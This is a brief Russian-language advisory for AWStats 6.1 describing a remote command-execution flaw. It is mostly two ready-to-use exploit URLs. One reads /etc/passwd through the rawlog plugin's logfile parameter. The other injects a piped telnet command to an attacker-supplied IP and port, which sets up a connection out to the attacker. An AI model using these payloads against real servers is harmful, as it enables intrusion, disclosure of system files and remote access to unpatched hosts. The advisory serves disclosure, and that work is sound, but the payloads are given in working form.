Программа: AWStats 6.1
Уязвимость в AWStats позволяет удаленному пользователю выполнить произвольные команды на целевой системе.
Пример:
http://[target]/awstats.pl?filterrawlog=&rawlog_maxlines= 5000&config=stats.jdims.info&framename=
main&pluginmode=rawlog&logfile= /etc/passwd
http://[target]/awstats.pl?filterrawlog=&rawlog_maxlines= 5000&config=stats.jdims.info&framename=main&
pluginmode=rawlog&logfile=&logfile= |telnet<your ip> <port>